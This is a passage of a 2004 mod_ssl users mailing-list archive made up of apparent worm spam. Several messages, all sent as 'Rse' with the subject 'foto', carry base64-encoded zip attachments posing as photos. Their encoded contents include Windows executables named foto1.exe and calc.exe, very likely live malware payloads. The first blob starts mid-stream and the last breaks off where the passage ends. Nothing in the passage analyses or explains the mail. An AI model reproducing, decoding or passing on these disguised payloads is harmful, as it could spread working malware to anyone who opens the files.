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
AA==

----------difuhqhqxwfibdcyvhgm--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 00:24:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D1F5AA8978; Wed,  1 Sep 2004 00:24:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from BENTOUMIA.net (ll212-225-86-217-212.ll212.iam.net.ma [212.217.86.225])
	by master.modssl.org (Postfix) with SMTP id 60869A8934
	for ; Wed,  1 Sep 2004 00:24:10 +0200 (CEST)
Date: Tue, 31 Aug 2004 22:22:25 +0000
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------euclqhoahaafxitrhasc"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------euclqhoahaafxitrhasc
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------euclqhoahaafxitrhasc
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------euclqhoahaafxitrhasc--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 01:06:03 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C462CA8A79; Wed,  1 Sep 2004 01:06:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from gmekala-2k.org (movaris130.hicap.alink.net [207.135.81.130])
	by master.modssl.org (Postfix) with SMTP id 9F6B4A8982
	for ; Wed,  1 Sep 2004 01:06:02 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:05:54 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------lwpkogyxgkcqeoxlubkg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------lwpkogyxgkcqeoxlubkg
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------lwpkogyxgkcqeoxlubkg
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
